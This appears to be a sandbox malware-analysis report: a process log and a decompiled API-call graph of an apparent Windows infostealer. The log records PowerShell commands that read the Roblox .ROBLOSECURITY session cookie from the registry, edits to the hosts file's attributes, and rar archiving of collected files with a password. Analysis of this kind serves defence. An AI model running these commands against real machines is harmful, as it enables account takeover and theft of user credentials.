                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                      Imagebase:0x7ff786950000
                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:93
                                                                                                                                                                                                                                      Start time:13:37:08
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                      Imagebase:0x7ff6e7290000
                                                                                                                                                                                                                                      File size:23'040 bytes
                                                                                                                                                                                                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:94
                                                                                                                                                                                                                                      Start time:13:37:09
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:95
                                                                                                                                                                                                                                      Start time:13:37:09
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:96
                                                                                                                                                                                                                                      Start time:13:37:09
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:97
                                                                                                                                                                                                                                      Start time:13:37:09
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                      Imagebase:0x7ff786950000
                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:98
                                                                                                                                                                                                                                      Start time:13:37:09
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:99
                                                                                                                                                                                                                                      Start time:13:37:09
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                      Imagebase:0x7ff6e7290000
                                                                                                                                                                                                                                      File size:23'040 bytes
                                                                                                                                                                                                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:100
                                                                                                                                                                                                                                      Start time:13:37:10
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:101
                                                                                                                                                                                                                                      Start time:13:37:10
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:102
                                                                                                                                                                                                                                      Start time:13:37:10
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:103
                                                                                                                                                                                                                                      Start time:13:37:10
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:104
                                                                                                                                                                                                                                      Start time:13:37:10
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                      Imagebase:0x7ff786950000
                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:105
                                                                                                                                                                                                                                      Start time:13:37:11
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                      Imagebase:0x7ff79c5e0000
                                                                                                                                                                                                                                      File size:106'496 bytes
                                                                                                                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:106
                                                                                                                                                                                                                                      Start time:13:37:11
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:107
                                                                                                                                                                                                                                      Start time:13:37:11
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:108
                                                                                                                                                                                                                                      Start time:13:37:11
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:109
                                                                                                                                                                                                                                      Start time:13:37:11
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:110
                                                                                                                                                                                                                                      Start time:13:37:11
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:111
                                                                                                                                                                                                                                      Start time:13:37:11
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                      Imagebase:0x7ff786950000
                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:112
                                                                                                                                                                                                                                      Start time:13:37:12
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:113
                                                                                                                                                                                                                                      Start time:13:37:13
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:114
                                                                                                                                                                                                                                      Start time:13:37:13
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:115
                                                                                                                                                                                                                                      Start time:13:37:15
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\JFeXQ.zip" *"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:116
                                                                                                                                                                                                                                      Start time:13:37:15
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:141
                                                                                                                                                                                                                                      Start time:13:37:17
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:
                                                                                                                                                                                                                                      Has administrator privileges:
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:12.4%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                        Signature Coverage:1.7%
                                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                                        Total number of Limit Nodes:34
                                                                                                                                                                                                                                        execution_graph 10282 402e57 10283 40dfc0 21 API calls 10282->10283 10284 402e5d 10283->10284 10285 40a4f4 5 API calls 10284->10285 10286 402e68 10285->10286 10295 40de80 GetLastError TlsGetValue SetLastError 10286->10295 10288 402e6e 10296 40de80 GetLastError TlsGetValue SetLastError 10288->10296 10290 402e76 10291 409bc0 4 API calls 10290->10291 10292 402e81 10291->10292 10293 40dec0 3 API calls 10292->10293 10294 402e90 10293->10294 10295->10288 10296->10290 7325 401000 memset GetModuleHandleW HeapCreate 7326 401044 7325->7326 7375 40de30 HeapCreate TlsAlloc 7326->7375 7328 401053 7378 40aaa0 7328->7378 7330 40105d 7381 409b40 HeapCreate 7330->7381 7332 40106c 7382 409669 7332->7382 7334 401071 7387 408dee memset InitCommonControlsEx CoInitialize 7334->7387 7336 401076 7388 4053bb InitializeCriticalSection 7336->7388 7338 40107b 7389 405068 7338->7389 7347 40a3da 16 API calls 7348 4010f4 7347->7348 7349 40a348 13 API calls 7348->7349 7350 40110f 7349->7350 7420 40dbca 7350->7420 7352 40112d 7353 405068 4 API calls 7352->7353 7354 40113d 7353->7354 7355 40a3da 16 API calls 7354->7355 7356 401148 7355->7356 7357 40a348 13 API calls 7356->7357 7358 401163 7357->7358 7426 409930 7358->7426 7360 40116f 7432 40de80 GetLastError TlsGetValue SetLastError 7360->7432 7362 401175 7433 402f41 7362->7433 7366 401186 7458 401b8f 7366->7458 7369 40119b 7565 403df3 7369->7565 7909 40e6a0 HeapAlloc HeapAlloc TlsSetValue 7375->7909 7377 40de57 7377->7328 7910 40d52c HeapAlloc HeapAlloc InitializeCriticalSection 7378->7910 7380 40aaae 7380->7330 7381->7332 7911 40d353 7382->7911 7386 409687 InitializeCriticalSection 7386->7334 7387->7336 7388->7338 7923 40e130 7389->7923 7391 401095 GetStdHandle 7392 409de0 7391->7392 7930 409ecf 7392->7930 7395 4010c3 7404 40a3da 7395->7404 7396 409e0b 7397 409e14 7396->7397 7398 409e17 HeapAlloc 7396->7398 7397->7398 7399 409e93 HeapFree 7398->7399 7401 409e2e 7398->7401 7400 409ea4 7399->7400 7400->7395 7941 40d819 7401->7941 7405 40a3e3 7404->7405 7406 4010ce 7404->7406 8010 40a496 7405->8010 7415 40a348 HeapAlloc 7406->7415 7409 40d946 9 API calls 7410 40a3f3 7409->7410 7411 40a420 7410->7411 7412 40a40e HeapFree 7410->7412 7413 40a433 HeapFree 7411->7413 7414 40a427 HeapFree 7411->7414 7412->7411 7412->7412 7413->7406 7414->7413 7416 40a367 HeapAlloc 7415->7416 7417 40a37c 7415->7417 7416->7417 7418 40d819 11 API calls 7417->7418 7419 4010e9 7418->7419 7419->7347 8017 40dd1d 7420->8017 7423 40dbe7 RtlAllocateHeap 7424 40dc06 memset 7423->7424 7425 40dc4a 7423->7425 7424->7425 7425->7352 7427 409a50 7426->7427 7428 409a58 7427->7428 7429 409a7a SetUnhandledExceptionFilter 7427->7429 7430 409a61 SetUnhandledExceptionFilter 7428->7430 7431 409a6b SetUnhandledExceptionFilter 7428->7431 7429->7360 7430->7431 7431->7360 7432->7362 8023 40dfc0 7433->8023 7437 402f56 8038 40de80 GetLastError TlsGetValue SetLastError 7437->8038 7439 402fab 8039 40de80 GetLastError TlsGetValue SetLastError 7439->8039 7441 402fb3 8040 40de80 GetLastError TlsGetValue SetLastError 7441->8040 7443 402fbb 8041 40de80 GetLastError TlsGetValue SetLastError 7443->8041 7445 402fc3 8042 40d120 7445->8042 7449 402fde 8047 405eb0 7449->8047 7451 402fe6 8057 405170 TlsGetValue 7451->8057 7453 40117c 7454 40dec0 TlsGetValue 7453->7454 7455 40df06 RtlReAllocateHeap 7454->7455 7456 40dee9 RtlAllocateHeap 7454->7456 7457 40df27 7455->7457 7456->7457 7457->7366 7459 40dfc0 21 API calls 7458->7459 7460 401b9e 7459->7460 8082 40de80 GetLastError TlsGetValue SetLastError 7460->8082 7462 401ba4 8083 40de80 GetLastError TlsGetValue SetLastError 7462->8083 7464 401bb6 8084 40de80 GetLastError TlsGetValue SetLastError 7464->8084 7466 401bbe 8085 409698 7466->8085 7470 401bca LoadLibraryExW 7471 4051a0 3 API calls 7470->7471 7472 401bd7 EnumResourceTypesW FreeLibrary 7471->7472 7489 401c02 7472->7489 7473 401e16 7473->7473 7474 401ca0 7475 40a496 4 API calls 7474->7475 7477 401cab 7475->7477 7476 40de80 GetLastError TlsGetValue SetLastError 7476->7489 8093 40de80 GetLastError TlsGetValue SetLastError 7477->8093 7479 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7479->7489 7480 401cb1 8094 40de80 GetLastError TlsGetValue SetLastError 7480->8094 7482 401cb9 8095 40de80 GetLastError TlsGetValue SetLastError 7482->8095 7484 401cc1 8096 40de80 GetLastError TlsGetValue SetLastError 7484->8096 7486 401cc9 8097 40de80 GetLastError TlsGetValue SetLastError 7486->8097 7488 401cd6 8098 40de80 GetLastError TlsGetValue SetLastError 7488->8098 7489->7473 7489->7474 7489->7476 7489->7479 7494 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7489->7494 7491 401cde 8099 405e10 7491->8099 7494->7489 7496 401cee 8108 40d100 7496->8108 7500 401cfb 7501 405eb0 6 API calls 7500->7501 7502 401d03 7501->7502 7503 40dec0 3 API calls 7502->7503 7504 401d0d 7503->7504 8112 40de80 GetLastError TlsGetValue SetLastError 7504->8112 7506 401d17 8113 40e020 7506->8113 7508 401d1f 7509 40dec0 3 API calls 7508->7509 7510 401d29 7509->7510 8118 40de80 GetLastError TlsGetValue SetLastError 7510->8118 7512 401d2f 8119 40de80 GetLastError TlsGetValue SetLastError 7512->8119 7514 401d37 8120 40de80 GetLastError TlsGetValue SetLastError 7514->8120 7516 401d3f 8121 40de80 GetLastError TlsGetValue SetLastError 7516->8121 7518 401d47 7519 40d100 8 API calls 7518->7519 7520 401d57 7519->7520 8122 405182 TlsGetValue 7520->8122 7522 401d5c 7523 405eb0 6 API calls 7522->7523 7524 401d64 7523->7524 7525 40dec0 3 API calls 7524->7525 7526 401d6e 7525->7526 8123 40de80 GetLastError TlsGetValue SetLastError 7526->8123 7528 401d74 8124 40de80 GetLastError TlsGetValue SetLastError 7528->8124 7530 401d7c 8125 405f20 7530->8125 7532 401d8c 7533 40dec0 3 API calls 7532->7533 7534 401d96 7533->7534 7534->7473 8133 40985e 7534->8133 7537 401e12 7540 40df50 HeapFree 7537->7540 7539 401db5 8139 40de80 GetLastError TlsGetValue SetLastError 7539->8139 7542 401e2b 7540->7542 7544 40df50 HeapFree 7542->7544 7543 401dbd 8140 409872 7543->8140 7546 401e34 7544->7546 7548 40df50 HeapFree 7546->7548 7550 401e3d 7548->7550 7552 40df50 HeapFree 7550->7552 7551 401dce 8150 405160 7551->8150 7554 401e46 7552->7554 7555 40df50 HeapFree 7554->7555 7556 40118b 7555->7556 7556->7369 7792 403001 7556->7792 7557 401dd9 7557->7537 8153 40de80 GetLastError TlsGetValue SetLastError 7557->8153 7559 401df2 8154 40de80 GetLastError TlsGetValue SetLastError 7559->8154 7561 401dfa 7562 409872 21 API calls 7561->7562 7563 401e06 7562->7563 7564 40dec0 3 API calls 7563->7564 7564->7537 7566 403df9 7565->7566 7566->7566 7567 40dfc0 21 API calls 7566->7567 7583 403e0b 7567->7583 7568 405dc0 3 API calls 7568->7583 7569 40de80 GetLastError TlsGetValue SetLastError 7590 403e8c 7569->7590 7570 40de80 GetLastError TlsGetValue SetLastError 7596 403f0d 7570->7596 7571 405dc0 3 API calls 7571->7590 7572 40de80 GetLastError TlsGetValue SetLastError 7572->7583 7573 405dc0 3 API calls 7573->7596 7574 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7574->7583 7575 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7575->7596 7576 405dc0 3 API calls 7601 403f8e 7576->7601 7577 40de80 GetLastError TlsGetValue SetLastError 7606 40400f 7577->7606 7578 40de80 GetLastError TlsGetValue SetLastError 7611 404090 7578->7611 7579 40de80 GetLastError TlsGetValue SetLastError 7620 404115 7579->7620 7580 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7580->7590 7581 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7581->7601 7582 405dc0 3 API calls 7582->7606 7583->7568 7583->7572 7583->7574 7588 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7583->7588 7583->7590 7584 40de80 GetLastError TlsGetValue SetLastError 7584->7601 7585 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7585->7606 7586 405dc0 3 API calls 7586->7611 7587 40de80 GetLastError TlsGetValue SetLastError 7612 40419a 7587->7612 7588->7583 7589 4042a4 8189 40de80 GetLastError TlsGetValue SetLastError 7589->8189 7590->7569 7590->7571 7590->7580 7591 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7590->7591 7590->7596 